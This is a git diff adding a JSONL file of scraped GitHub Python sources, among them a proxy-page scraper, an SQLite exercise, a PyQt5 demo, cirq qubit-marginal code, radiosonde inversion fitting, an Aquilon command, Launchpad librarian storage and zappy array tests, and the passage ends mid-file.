diff --git "a/4717.jsonl" "b/4717.jsonl" new file mode 100644--- /dev/null +++ "b/4717.jsonl" @@ -0,0 +1,1012 @@ +{"seq_id":"74613601473","text":"import requests\r\nfrom pyquery import PyQuery as pq\r\n\r\ndef get_goubanjia(url):\r\n headers = {\r\n \"User-Agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36\"\r\n }\r\n response = requests.get(url,headers=headers)\r\n text = response.content.decode(\"utf-8\")\r\n html = pq(text)\r\n return html\r\n","repo_name":"guguji12345/ProxyPool","sub_path":"proxypool/get_goubanjia_html.py","file_name":"get_goubanjia_html.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38561659934","text":"import sqlite3\n\nconn = sqlite3.connect(\"arda.db\")\nc = conn.cursor()\n\n\nmany_customers = [('Was', 'Sas', 'bus'), ('deym', 'geym', 'beym')]\n\nc.execute(\"\"\"CREATE TABLE IF NOT EXISTS kisiler(\n firstName text,\n lastName text,\n email text\n)\"\"\")\nc.execute(\"\"\"INSERT INTO kisiler VALUES('Arda','Kilinc','arda.com')\"\"\")\n\n#c.executemany(\"\"\"INSERT INTO kisiler VALUES(?,?,?)\"\"\",many_customers)\n\nconn.commit() # commit edilmezse execute çalışmaz\nconn.close()\n","repo_name":"adraarda23/sqlpracticefornewbies","sub_path":"sqlpractice1.py","file_name":"sqlpractice1.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"20072098396","text":"from PyQt5.QtWidgets import * # *代表所有的class\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtGui import *\n\nfrom mainwindow1 import Ui_Dialog\nimport sys\n\ndef clicked_hi():\n message = QMessageBox()\n x = ui.lineEdit.text()\n message.setWindowTitle(\"surprice\")\n message.setInformativeText(x)\n message.exec_()\n ui.progressBar.setValue(90)\n\ndef clicked_hello():\n ui.label.setText = \"Hello\"\n print(\"Hello\")\n ui.progressBar.setValue(40)\n\ndef pic_click(event):\n message = QMessageBox()\n message.setWindowTitle(\"surprice\")\n message.setInformativeText(\"你按了圖片!!\")\n message.exec_()\n \ndef slider_change():\n x = ui.horizontalSlider.value()\n print(f\"change it is : {x}\")\n\ndef slider_release():\n message = QMessageBox()\n message.setWindowTitle(\"surprice\")\n message.setInformativeText(\"你選擇的是!! \"+str(ui.horizontalSlider.value()))\n message.exec_()\napp = QApplication(sys.argv)\nwidget = QWidget()\nui = Ui_Dialog()\nui.setupUi(widget)\n\nui.progressBar.setMaximum(100)\nui.progressBar.setMinimum(0)\nui.progressBar.setValue(3)\nui.horizontalSlider.setMaximum(110)\nui.horizontalSlider.setMinimum(-3)\nui.horizontalSlider.valueChanged.connect(slider_change)\nui.horizontalSlider.sliderReleased.connect(slider_release)\n\n\nui.Test.clicked.connect(clicked_hi)\nui.helloButton.clicked.connect(clicked_hello)\nui.pic.mouseReleaseEvent = pic_click\n\nwidget.show()\napp.exec_()","repo_name":"lin880005/qt_test","sub_path":"test_2.py","file_name":"test_2.py","file_ext":"py","file_size_in_byte":1414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"37511126295","text":"\"\"\"\nImplementation of Zhang's Bell measurement to obtain\nall k-qubit RDM information\n\"\"\"\nfrom itertools import product\nfrom itertools import combinations\nfrom collections import defaultdict\n\nimport numpy as np\nimport cirq\n\n\ndef qubit_marginal_op_basis(marginal_rank, qubits):\n \"\"\"\n Generate operator basis for the k-qubit marginals\n\n :param marginal_rank: 1-qubit marginals, 2-qubit marginals etc.\n :param qubits: list of Qid objects\n :return:\n \"\"\"\n qubit_type = {0: cirq.I, 1: 'X', 2: 'Y', 3: 'Z'}\n qubit_sets = defaultdict(list)\n n_qubits = len(qubits)\n for qs in combinations(range(n_qubits), marginal_rank):\n qs_sorted = tuple(sorted([qubits[qq] for qq in qs]))\n # Construct pauli operator basis for this subset of qubits\n # {I, X, Y, Z}^{|q-subset|}\n for pauli_term_per_qubit in product(range(4), repeat=len(qs)):\n paulistring = dict([(qubits[qs[qidx]], qubit_type[pauli_type]) for qidx, pauli_type in enumerate(pauli_term_per_qubit)])\n qubit_sets[qs_sorted].append(cirq.PauliString(paulistring))\n\n return qubit_sets\n\n\ndef get_qubit_marginals_cirq(state, qubits, qubit_marginal_rank):\n \"\"\"\n Calculate the qubit marginals for a state using cirq's marginalization\n routines\n\n :param state:\n :param n_qubits:\n :return:\n \"\"\"\n qubit_marginal_basis = qubit_marginal_op_basis(qubit_marginal_rank, qubits)\n marginal_dict = {}\n for key, val in qubit_marginal_basis.items():\n rho_true = cirq.density_matrix_from_state_vector(state_vector=state,\n indices=[kk._x for kk in\n key])\n marginal_dict[key] = rho_true\n return marginal_dict\n\n\ndef get_qubit_marginals(state, qubits, qubit_marginal_rank) -> dict:\n \"\"\"\n Calculate the qubit marginals for a state\n\n :param state: state vector\n :param n_qubits: total number of qubits\n :param qubit_marginal_rank: rank of marginal to calculate\n :return: dictionary where key is subset of qubits and value is marginal\n density matrix\n \"\"\"\n qubit_marginal_basis = qubit_marginal_op_basis(qubit_marginal_rank, qubits)\n marginal_dict = {}\n for key, val in qubit_marginal_basis.items():\n rho = np.zeros((2**len(key), 2**len(key)), dtype=np.complex128)\n for pterm in val:\n pauli_op_mat = cirq.unitary(cirq.Circuit([cirq.I(xx) for xx in qubits] + [pterm]))\n test_pauli_expect = (state.conj().T @ pauli_op_mat @ state).real\n pauli_op_mat_marginal = cirq.unitary(cirq.Circuit([cirq.I(xx) for xx in key] + [pterm]))\n rho += test_pauli_expect * pauli_op_mat_marginal / 2**len(key)\n marginal_dict[key] = rho\n return marginal_dict\n\n\ndef get_qubit_marginal_expectations(state, qubits, qubit_marginal_rank) -> dict:\n \"\"\"\n Calculate the qubit marginals for a state\n\n :param state: state vector\n :param n_qubits: total number of qubits\n :param qubit_marginal_rank: rank of marginal to calculate\n :return: dictionary where key is subset of qubits and value a dictionary\n with keys as cirq.PauliString (P) and value as \n \"\"\"\n qubit_map = dict(zip(qubits, range(len(qubits))))\n qubit_marginal_basis = qubit_marginal_op_basis(qubit_marginal_rank, qubits)\n marginal_dict = defaultdict(dict)\n for key, val in qubit_marginal_basis.items():\n for pterm in val:\n marginal_dict[key][pterm] = pterm.expectation_from_state_vector(state, qubit_map=qubit_map).real\n return marginal_dict\n","repo_name":"ncrubin/qcpanop","sub_path":"qcpanop/qubit_measurement/qubit_marginal_ops.py","file_name":"qubit_marginal_ops.py","file_ext":"py","file_size_in_byte":3623,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"36916638922","text":"\nimport numpy as np\n\nclass Layer: #class to store a compressed layer from radiosonde\n \n def __init__(self,z_bottom,z_top,T_bottom,T_top,slope,intercept):\n self.z_bottom = z_bottom #layer bottom height\n self.z_top = z_top #layer top height\n self.T_bottom = T_bottom #temperature at layer bottom\n self.T_top = T_top #temperature at layer top\n self.slope = slope #slope of the compressed layer linear fit\n self.intercept = intercept #intercept point of the compressed layer linear fit\n \nclass Inversion: #class to store temperature inversion information\n\n def __init__(self,inv_bottom,inv_top,temp_bottom,temp_top,layer):\n self.inv_bottom = inv_bottom #inversion bottom\n self.inv_top = inv_top #inversion top\n self.temp_bottom = temp_bottom #temperature at the inversion bottom\n self.temp_top = temp_top #temperature at the inversion top\n self.layer = layer #elevated or surface based inversion\n \ndef layer_fitting(z,T,error):\n\n def layer_fit(z,T,beg,end,error):\n\n def temp_fit(x,y):\n p = np.polyfit(np.array([x[0],x[x.size-1]]),np.array([y[0],y[y.size-1]]),1)\n y_fit = np.poly1d(p)(x)\n e_fit = np.linalg.norm(y_fit-y)\n return e_fit,p\n \n e = 1\n l = end+1\n while e >= error and l-beg > 1:\n l -= 1\n e,p = temp_fit(z[beg:l+1],T[beg:l+1])\n return p,l\n \n layers = []\n# z = z[~np.isnan(T)] #removing nans\n# T = T[~np.isnan(T)] #removing nans\n beg = 0\n end = z.size-1\n while end-beg >= 1:\n z_bottom = z[beg]\n T_bottom = T[beg]\n poly,beg = layer_fit(z,T,beg,end,error) #beg is now the returned endpoint\n z_top = z[beg]\n T_top = T[beg]\n slope = poly[0]\n intercept = poly[1]\n layer = Layer(z_bottom,z_top,T_bottom,T_top,slope,intercept)\n layers.append(layer)\n return layers\n \ndef get_inversions(layers):\n \n inversions = []\n n = 0\n m = 1\n for i in range(0,len(layers)-1):\n if np.sign(layers[i].slope) == -1:\n n = n + 1\n if np.sign(layers[i].slope) == 1 and np.sign(layers[i+1].slope) == -1:\n inv_bottom = layers[n].z_bottom\n inv_top = layers[i].z_top\n temp_bottom = layers[n].T_bottom\n temp_top = layers[i].T_top\n if n == 0:\n layer = 'surfased based inversion'\n else:\n layer = 'elevated inversion ' + str(m)\n m += 1\n n = i + 1\n inversion = Inversion(inv_bottom,inv_top,temp_bottom,temp_top,layer)\n inversions.append(inversion)\n return inversions\n\ndef ntom(n,y,a):\n return n*(y/a+1)\n\ndef Nton(N):\n return N * 10e-6 + 1\n\ndef kfunc(y,n):\n return np.gradient(np.log(n),y)","repo_name":"dkllrjr/PyKeller","sub_path":"atmos_sci/gpsro.py","file_name":"gpsro.py","file_ext":"py","file_size_in_byte":2854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32272703616","text":"from aquilon.exceptions_ import ArgumentError\nfrom aquilon.aqdb.model import (Machine, ServiceMap, PersonalityServiceMap,\n DnsDomain)\nfrom aquilon.worker.broker import BrokerCommand # pylint: disable=W0611\nfrom aquilon.worker.dbwrappers.location import get_location\nfrom aquilon.worker.processes import DSDBRunner\nfrom aquilon.worker.templates.machine import PlenaryMachineInfo\nfrom aquilon.worker.templates.base import PlenaryCollection\n\n\n# based on update_rack\nclass CommandUpdateBuilding(BrokerCommand):\n\n required_parameters = [\"building\"]\n\n def render(self, session, logger, building, city, address,\n fullname, default_dns_domain, comments, **arguments):\n dbbuilding = get_location(session, building=building)\n\n old_city = dbbuilding.city\n\n dsdb_runner = DSDBRunner(logger=logger)\n\n if address is not None:\n old_address = dbbuilding.address\n dbbuilding.address = address\n dsdb_runner.update_building(dbbuilding.name, dbbuilding.address,\n old_address)\n if fullname is not None:\n dbbuilding.fullname = fullname\n if comments is not None:\n dbbuilding.comments = comments\n if default_dns_domain is not None:\n if default_dns_domain:\n dbdns_domain = DnsDomain.get_unique(session, default_dns_domain,\n compel=True)\n dbbuilding.default_dns_domain = dbdns_domain\n else:\n dbbuilding.default_dns_domain = None\n\n plenaries = PlenaryCollection(logger=logger)\n if city:\n dbcity = get_location(session, city=city)\n\n # This one would change the template's locations hence forbidden\n if dbcity.hub != dbbuilding.hub:\n # Doing this both to reduce user error and to limit\n # testing required.\n raise ArgumentError(\"Cannot change hubs. {0} is in {1} \"\n \"while {2} is in {3}.\".format(\n dbcity, dbcity.hub,\n dbbuilding, dbbuilding.hub))\n\n # issue svcmap warnings\n maps = 0\n for map_type in [ServiceMap, PersonalityServiceMap]:\n maps = maps + session.query(map_type).\\\n filter_by(location=old_city).count()\n\n if maps > 0:\n logger.client_info(\"There are {0} service(s) mapped to the \"\n \"old location of the ({1:l}), please \"\n \"review and manually update mappings for \"\n \"the new location as needed.\".format(\n maps, dbbuilding.city))\n\n dbbuilding.update_parent(parent=dbcity)\n\n if old_city.campus and (old_city.campus != dbcity.campus):\n dsdb_runner.del_campus_building(old_city.campus, building)\n\n if dbcity.campus and (old_city.campus != dbcity.campus):\n dsdb_runner.add_campus_building(dbcity.campus, building)\n\n query = session.query(Machine)\n query = query.filter(Machine.location_id.in_(dbcity.offspring_ids()))\n\n for dbmachine in query:\n plenaries.append(PlenaryMachineInfo(dbmachine, logger=logger))\n\n session.flush()\n\n if plenaries.plenaries:\n with plenaries.get_write_key() as key:\n plenaries.stash()\n try:\n plenaries.write(locked=True)\n dsdb_runner.commit_or_rollback()\n except:\n plenaries.restore_stash()\n else:\n dsdb_runner.commit_or_rollback()\n\n return\n","repo_name":"gombasg/aquilon","sub_path":"lib/python2.6/aquilon/worker/commands/update_building.py","file_name":"update_building.py","file_ext":"py","file_size_in_byte":3860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"61"} +{"seq_id":"36040796374","text":"__metaclass__ = type\n\nimport errno\nimport hashlib\nimport os\nimport shutil\nimport tempfile\n\nfrom lp.registry.model.product import Product\nfrom lp.services.config import dbconfig\nfrom lp.services.database import write_transaction\nfrom lp.services.database.interfaces import IStore\nfrom lp.services.database.postgresql import ConnectionString\n\n\n__all__ = [\n 'DigestMismatchError',\n 'LibrarianStorage',\n 'LibraryFileUpload',\n 'DuplicateFileIDError',\n 'WrongDatabaseError',\n # _relFileLocation needed by other modules in this package.\n # Listed here to keep the import fascist happy\n '_relFileLocation',\n '_sameFile',\n ]\n\n\nclass DigestMismatchError(Exception):\n \"\"\"The given digest doesn't match the SHA-1 digest of the file.\"\"\"\n\n\nclass DuplicateFileIDError(Exception):\n \"\"\"Given File ID already exists.\"\"\"\n\n\nclass WrongDatabaseError(Exception):\n \"\"\"The client's database name doesn't match our database.\"\"\"\n\n def __init__(self, clientDatabaseName, serverDatabaseName):\n Exception.__init__(self, clientDatabaseName, serverDatabaseName)\n self.clientDatabaseName = clientDatabaseName\n self.serverDatabaseName = serverDatabaseName\n\n\nclass LibrarianStorage:\n \"\"\"Blob storage.\n\n This manages the actual storage of files on disk and the record of those\n in the database; it has nothing to do with the network interface to those\n files.\n \"\"\"\n\n def __init__(self, directory, library):\n self.directory = directory\n self.library = library\n self.incoming = os.path.join(self.directory, 'incoming')\n try:\n os.mkdir(self.incoming)\n except OSError as e:\n if e.errno != errno.EEXIST:\n raise\n\n def hasFile(self, fileid):\n return os.access(self._fileLocation(fileid), os.F_OK)\n\n def _fileLocation(self, fileid):\n return os.path.join(self.directory, _relFileLocation(str(fileid)))\n\n def startAddFile(self, filename, size):\n return LibraryFileUpload(self, filename, size)\n\n def getFileAlias(self, aliasid, token, path):\n return self.library.getAlias(aliasid, token, path)\n\n\nclass LibraryFileUpload(object):\n \"\"\"A file upload from a client.\"\"\"\n srcDigest = None\n mimetype = 'unknown/unknown'\n contentID = None\n aliasID = None\n expires = None\n databaseName = None\n debugID = None\n\n def __init__(self, storage, filename, size):\n self.storage = storage\n self.filename = filename\n self.size = size\n self.debugLog = []\n\n # Create temporary file\n tmpfile, tmpfilepath = tempfile.mkstemp(dir=self.storage.incoming)\n self.tmpfile = os.fdopen(tmpfile, 'w')\n self.tmpfilepath = tmpfilepath\n self.md5_digester = hashlib.md5()\n self.sha1_digester = hashlib.sha1()\n self.sha256_digester = hashlib.sha256()\n\n def append(self, data):\n self.tmpfile.write(data)\n self.md5_digester.update(data)\n self.sha1_digester.update(data)\n self.sha256_digester.update(data)\n\n @write_transaction\n def store(self):\n self.debugLog.append('storing %r, size %r'\n % (self.filename, self.size))\n self.tmpfile.close()\n\n # Verify the digest matches what the client sent us\n dstDigest = self.sha1_digester.hexdigest()\n if self.srcDigest is not None and dstDigest != self.srcDigest:\n # XXX: Andrew Bennetts 2004-09-20: Write test that checks that\n # the file really is removed or renamed, and can't possibly be\n # left in limbo\n os.remove(self.tmpfilepath)\n raise DigestMismatchError(self.srcDigest, dstDigest)\n\n try:\n # If the client told us the name of the database it's using,\n # check that it matches.\n if self.databaseName is not None:\n # Per Bug #840068, there are two methods of getting the\n # database name (connection string and db\n # introspection), and they can give different results\n # due to pgbouncer database aliases. Lets check both,\n # and succeed if either matches.\n config_dbname = ConnectionString(\n dbconfig.rw_main_master).dbname\n\n result = IStore(Product).execute(\"SELECT current_database()\")\n real_dbname = result.get_one()[0]\n if self.databaseName not in (config_dbname, real_dbname):\n raise WrongDatabaseError(\n self.databaseName, (config_dbname, real_dbname))\n\n self.debugLog.append(\n 'database name %r ok' % (self.databaseName, ))\n # If we haven't got a contentID, we need to create one and return\n # it to the client.\n if self.contentID is None:\n contentID = self.storage.library.add(\n dstDigest, self.size, self.md5_digester.hexdigest(),\n self.sha256_digester.hexdigest())\n aliasID = self.storage.library.addAlias(\n contentID, self.filename, self.mimetype, self.expires)\n self.debugLog.append('created contentID: %r, aliasID: %r.'\n % (contentID, aliasID))\n else:\n contentID = self.contentID\n aliasID = None\n self.debugLog.append('received contentID: %r' % (contentID, ))\n\n except:\n # Abort transaction and re-raise\n self.debugLog.append('failed to get contentID/aliasID, aborting')\n raise\n\n # Move file to final location\n try:\n self._move(contentID)\n except:\n # Abort DB transaction\n self.debugLog.append('failed to move file, aborting')\n\n # Remove file\n os.remove(self.tmpfilepath)\n\n # Re-raise\n raise\n\n # Commit any DB changes\n self.debugLog.append('committed')\n\n # Return the IDs if we created them, or None otherwise\n return contentID, aliasID\n\n def _move(self, fileID):\n location = self.storage._fileLocation(fileID)\n if os.path.exists(location):\n raise DuplicateFileIDError(fileID)\n try:\n os.makedirs(os.path.dirname(location))\n except OSError as e:\n # If the directory already exists, that's ok.\n if e.errno != errno.EEXIST:\n raise\n shutil.move(self.tmpfilepath, location)\n\n\ndef _sameFile(path1, path2):\n file1 = open(path1, 'rb')\n file2 = open(path2, 'rb')\n\n blk = 1024 * 64\n chunksIter = iter(lambda: (file1.read(blk), file2.read(blk)), ('', ''))\n for chunk1, chunk2 in chunksIter:\n if chunk1 != chunk2:\n return False\n return True\n\n\ndef _relFileLocation(file_id):\n \"\"\"Return the relative location for the given file_id.\n\n The relative location is obtained by converting file_id into a 8-digit hex\n and then splitting it across four path segments.\n \"\"\"\n h = \"%08x\" % int(file_id)\n return '%s/%s/%s/%s' % (h[:2], h[2:4], h[4:6], h[6:])\n","repo_name":"abramhindle/UnnaturalCodeFork","sub_path":"python/testdata/launchpad/lib/lp/services/librarianserver/storage.py","file_name":"storage.py","file_ext":"py","file_size_in_byte":7179,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"34130245456","text":"import concurrent.futures\nimport logging\nimport pytest\nimport sys\nimport numpy as np\nimport zappy.executor\nimport zappy.direct\nimport zappy.spark\nimport zarr\n\nfrom numpy.testing import assert_allclose\nfrom pyspark.sql import SparkSession\n\n# add/change to \"pywren_ndarray\" to run the tests using Pywren (requires Pywren to be installed)\nTESTS = [\n \"direct_ndarray\",\n \"direct_zarr\",\n \"executor_ndarray\",\n \"executor_zarr\",\n \"spark_ndarray\",\n \"spark_zarr\",\n]\n\n# only run Beam tests on Python 2, and don't run executor tests\nif sys.version_info[0] == 2:\n import apache_beam as beam\n from apache_beam.options.pipeline_options import PipelineOptions\n import zappy.beam\n\n TESTS = [\n \"direct_ndarray\",\n \"direct_zarr\",\n \"spark_ndarray\",\n \"spark_zarr\",\n \"beam_ndarray\",\n \"beam_zarr\",\n ]\n\n\nclass TestZappyArray:\n @pytest.fixture()\n def x(self):\n return np.array(\n [\n [0.0, 1.0, 0.0, 3.0, 0.0],\n [2.0, 0.0, 3.0, 4.0, 5.0],\n [4.0, 0.0, 0.0, 6.0, 7.0],\n ]\n )\n\n @pytest.fixture()\n def chunks(self):\n return (2, 5)\n\n @pytest.fixture()\n def xz(self, x, chunks, tmpdir):\n input_file_zarr = str(tmpdir.join(\"x.zarr\"))\n z = zarr.open(\n input_file_zarr, mode=\"w\", shape=x.shape, dtype=x.dtype, chunks=chunks\n )\n z[:] = x.copy() # write as zarr locally\n return input_file_zarr\n\n @pytest.fixture(scope=\"module\")\n def sc(self):\n logger = logging.getLogger(\"py4j\")\n logger.setLevel(logging.WARN)\n spark = (\n SparkSession.builder.master(\"local[2]\")\n .appName(\"my-local-testing-pyspark-context\")\n .getOrCreate()\n )\n yield spark.sparkContext\n spark.stop()\n\n @pytest.fixture(params=TESTS)\n def xd(self, sc, x, xz, chunks, request):\n if request.param == \"direct_ndarray\":\n yield zappy.direct.from_ndarray(x.copy(), chunks)\n elif request.param == \"direct_zarr\":\n yield zappy.direct.from_zarr(xz)\n elif request.param == \"executor_ndarray\":\n with concurrent.futures.ThreadPoolExecutor(max_workers=2) as executor:\n yield zappy.executor.from_ndarray(executor, x.copy(), chunks)\n elif request.param == \"executor_zarr\":\n with concurrent.futures.ThreadPoolExecutor(max_workers=2) as executor:\n yield zappy.executor.from_zarr(executor, xz)\n elif request.param == \"spark_ndarray\":\n yield zappy.spark.from_ndarray(sc, x.copy(), chunks)\n elif request.param == \"spark_zarr\":\n yield zappy.spark.from_zarr(sc, xz)\n elif request.param == \"beam_ndarray\":\n pipeline_options = PipelineOptions()\n pipeline = beam.Pipeline(options=pipeline_options)\n yield zappy.beam.from_ndarray(pipeline, x.copy(), chunks)\n elif request.param == \"beam_zarr\":\n pipeline_options = PipelineOptions()\n pipeline = beam.Pipeline(options=pipeline_options)\n yield zappy.beam.from_zarr(pipeline, xz)\n elif request.param == \"pywren_ndarray\":\n executor = zappy.executor.PywrenExecutor()\n yield zappy.executor.from_ndarray(executor, x.copy(), chunks)\n\n @pytest.fixture(params=TESTS)\n def xd_and_temp_store(self, sc, x, xz, chunks, request):\n if request.param == \"direct_ndarray\":\n yield zappy.direct.from_ndarray(x.copy(), chunks), zarr.TempStore()\n elif request.param == \"direct_zarr\":\n yield zappy.direct.from_zarr(xz), zarr.TempStore()\n elif request.param == \"executor_ndarray\":\n with concurrent.futures.ThreadPoolExecutor(max_workers=2) as executor:\n yield zappy.executor.from_ndarray(\n executor, x.copy(), chunks\n ), zarr.TempStore()\n elif request.param == \"executor_zarr\":\n with concurrent.futures.ThreadPoolExecutor(max_workers=2) as executor:\n yield zappy.executor.from_zarr(executor, xz), zarr.TempStore()\n elif request.param == \"spark_ndarray\":\n yield zappy.spark.from_ndarray(sc, x.copy(), chunks), zarr.TempStore()\n elif request.param == \"spark_zarr\":\n yield zappy.spark.from_zarr(sc, xz), zarr.TempStore()\n elif request.param == \"beam_ndarray\":\n pipeline_options = PipelineOptions()\n pipeline = beam.Pipeline(options=pipeline_options)\n yield zappy.beam.from_ndarray(pipeline, x.copy(), chunks), zarr.TempStore()\n elif request.param == \"beam_zarr\":\n pipeline_options = PipelineOptions()\n pipeline = beam.Pipeline(options=pipeline_options)\n yield zappy.beam.from_zarr(pipeline, xz), zarr.TempStore()\n elif request.param == \"pywren_ndarray\":\n import s3fs.mapping\n\n def create_unique_bucket_name(prefix):\n import uuid\n\n return \"%s-%s\" % (prefix, str(uuid.uuid4()).replace(\"-\", \"\"))\n\n s3 = s3fs.S3FileSystem()\n bucket = create_unique_bucket_name(\"zappy-test\")\n s3.mkdir(bucket)\n path = \"%s/%s\" % (bucket, \"test.zarr\")\n s3store = s3fs.mapping.S3Map(path, s3=s3)\n executor = zappy.executor.PywrenExecutor()\n yield zappy.executor.from_ndarray(executor, x.copy(), chunks), s3store\n s3.rm(bucket, recursive=True)\n\n @pytest.fixture(params=[\"direct\", \"executor\", \"spark\"]) # TODO: beam\n def zeros(self, sc, request):\n if request.param == \"direct\":\n yield zappy.direct.zeros((3, 5), chunks=(2, 5), dtype=int)\n elif request.param == \"executor\":\n with concurrent.futures.ThreadPoolExecutor(max_workers=2) as executor:\n yield zappy.executor.zeros(executor, (3, 5), chunks=(2, 5), dtype=int)\n elif request.param == \"spark\":\n yield zappy.spark.zeros(sc, (3, 5), chunks=(2, 5), dtype=int)\n\n @pytest.fixture(params=[\"direct\", \"executor\", \"spark\"]) # TODO: beam\n def ones(self, sc, request):\n if request.param == \"direct\":\n yield zappy.direct.ones((3, 5), chunks=(2, 5), dtype=int)\n elif request.param == \"executor\":\n with concurrent.futures.ThreadPoolExecutor(max_workers=2) as executor:\n yield zappy.executor.ones(executor, (3, 5), chunks=(2, 5), dtype=int)\n elif request.param == \"spark\":\n yield zappy.spark.ones(sc, (3, 5), chunks=(2, 5), dtype=int)\n\n def test_identity(self, x, xd):\n assert_allclose(np.asarray(xd), x)\n\n def test_astype(self, x, xd):\n xd = xd.astype(int)\n x = x.astype(int)\n assert xd.dtype == x.dtype\n assert_allclose(np.asarray(xd), x)\n\n def test_astype_inplace(self, x, xd):\n original_id = id(xd)\n xd = xd.astype(int, copy=False)\n assert original_id == id(xd)\n x = x.astype(int, copy=False)\n assert xd.dtype == x.dtype\n assert_allclose(np.asarray(xd), x)\n\n def test_asarray(self, x, xd):\n assert_allclose(np.asarray(xd), x)\n\n def test_scalar_arithmetic(self, x, xd):\n xd = (((xd + 1) * 2) - 4) / 1.1\n x = (((x + 1) * 2) - 4) / 1.1\n assert_allclose(np.asarray(xd), x)\n\n def test_arithmetic(self, x, xd):\n xd = xd * 2 + xd\n x = x * 2 + x\n assert_allclose(np.asarray(xd), x)\n\n def test_broadcast_row(self, x, xd):\n a = np.array([1.0, 2.0, 3.0, 4.0, 5.0])\n xd = xd + a\n x = x + a\n assert_allclose(np.asarray(xd), x)\n\n def test_broadcast_col(self, x, xd):\n if sys.version_info[0] == 2 and isinstance(\n xd, zappy.beam.array.BeamZappyArray\n ): # TODO: fix this\n return\n a = np.array([[1.0], [2.0], [3.0]])\n xd = xd + a\n x = x + a\n assert_allclose(np.asarray(xd), x)\n\n def test_eq(self, x, xd):\n xd = xd == 0.0\n x = x == 0.0\n assert xd.dtype == x.dtype\n assert_allclose(np.asarray(xd), x)\n\n def test_ne(self, x, xd):\n xd = xd != 0.0\n x = x != 0.0\n assert_allclose(np.asarray(xd), x)\n\n def test_invert(self, x, xd):\n xd = ~(xd == 0.0)\n x = ~(x == 0.0)\n assert_allclose(np.asarray(xd), x)\n\n def test_inplace(self, x, xd):\n original_id = id(xd)\n xd += 1\n assert original_id == id(xd)\n x += 1\n assert_allclose(np.asarray(xd), x)\n\n def test_simple_index(self, x, xd):\n xd = xd[0]\n x = x[0]\n assert_allclose(xd, x)\n\n def test_boolean_index(self, x, xd):\n xd = np.sum(xd, axis=1) # sum rows\n xd = xd[xd > 5]\n x = np.sum(x, axis=1) # sum rows\n x = x[x > 5]\n assert_allclose(np.asarray(xd), x)\n\n def test_slice_cols(self, x, xd):\n xd = xd[:, 1:3]\n x = x[:, 1:3]\n assert xd.shape == x.shape\n assert_allclose(np.asarray(xd), x)\n\n def test_slice_rows(self, x, xd):\n xd = xd[1:3, :]\n x = x[1:3, :]\n assert xd.shape == x.shape\n assert_allclose(np.asarray(xd), x)\n\n def test_slice_rows_shrink_partitions(self, x, xd):\n if sys.version_info[0] == 2 and isinstance(\n xd, zappy.beam.array.BeamZappyArray\n ): # TODO: fix this\n return\n xd = xd[0:2, :]\n x = x[0:2, :]\n assert xd.shape == x.shape\n assert_allclose(np.asarray(xd), x)\n\n def test_subset_cols_boolean(self, x, xd):\n subset = np.array([True, False, True, False, True])\n xd = xd[:, subset]\n x = x[:, subset]\n assert xd.shape == x.shape\n assert_allclose(np.asarray(xd), x)\n\n def test_subset_rows_boolean(self, x, xd):\n subset = np.array([True, False, True])\n xd = xd[subset, :]\n x = x[subset, :]\n assert xd.shape == x.shape\n assert_allclose(np.asarray(xd), x)\n\n def test_subset_cols_int(self, x, xd):\n subset = np.array([1, 3])\n xd = xd[:, subset]\n x = x[:, subset]\n assert xd.shape == x.shape\n assert_allclose(np.asarray(xd), x)\n\n def test_subset_rows_int(self, x, xd):\n subset = np.array([1, 2])\n xd = xd[subset, :]\n x = x[subset, :]\n assert xd.shape == x.shape\n assert_allclose(np.asarray(xd), x)\n\n def test_newaxis(self, x, xd):\n xd = np.sum(xd, axis=1)[:, np.newaxis]\n x = np.sum(x, axis=1)[:, np.newaxis]\n assert_allclose(np.asarray(xd), x)\n\n def test_log1p(self, x, xd):\n log1pnps = np.asarray(np.log1p(xd))\n log1pnp = np.log1p(x)\n assert_allclose(log1pnps, log1pnp)\n\n def test_sum(self, x, xd):\n if sys.version_info[0] == 2 and isinstance(\n xd, zappy.beam.array.BeamZappyArray\n ): # TODO: fix this\n return\n totald = np.sum(xd)\n total = np.sum(x)\n assert totald == pytest.approx(total)\n\n def test_sum_cols(self, x, xd):\n xd = np.sum(xd, axis=0)\n x = np.sum(x, axis=0)\n assert_allclose(np.asarray(xd), x)\n\n def test_sum_rows(self, x, xd):\n xd = np.sum(xd, axis=1)\n x = np.sum(x, axis=1)\n assert_allclose(np.asarray(xd), x)\n\n def test_mean(self, x, xd):\n if sys.version_info[0] == 2 and isinstance(\n xd, zappy.beam.array.BeamZappyArray\n ): # TODO: fix this\n return\n meand = np.mean(xd)\n mean = np.mean(x)\n assert meand == pytest.approx(mean)\n\n def test_mean_cols(self, x, xd):\n xd = np.mean(xd, axis=0)\n x = np.mean(x, axis=0)\n assert_allclose(np.asarray(xd), x)\n\n def test_mean_rows(self, x, xd):\n xd = np.mean(xd, axis=1)\n x = np.mean(x, axis=1)\n assert_allclose(np.asarray(xd), x)\n\n def test_var(self, x, xd):\n def var(x):\n mean = x.mean(axis=0)\n mean_sq = np.multiply(x, x).mean(axis=0)\n return mean_sq - mean ** 2\n\n varnps = np.asarray(var(xd))\n varnp = var(x)\n assert_allclose(varnps, varnp)\n\n def test_median(self, x, xd):\n mediand = np.median(xd) # implicitly converts to np.array\n median = np.median(x)\n assert mediand == pytest.approx(median)\n\n def test_write_zarr(self, x, xd_and_temp_store):\n xd, temp_store = xd_and_temp_store\n xd.to_zarr(temp_store, xd.chunks)\n # read back as zarr directly and check it is the same as x\n z = zarr.open(temp_store, mode=\"r\", shape=x.shape, dtype=x.dtype, chunks=(2, 5))\n arr = z[:]\n assert_allclose(arr, x)\n\n def test_write_zarr_ncopies(self, x, xd_and_temp_store):\n xd, temp_store = xd_and_temp_store\n if sys.version_info[0] == 2 and 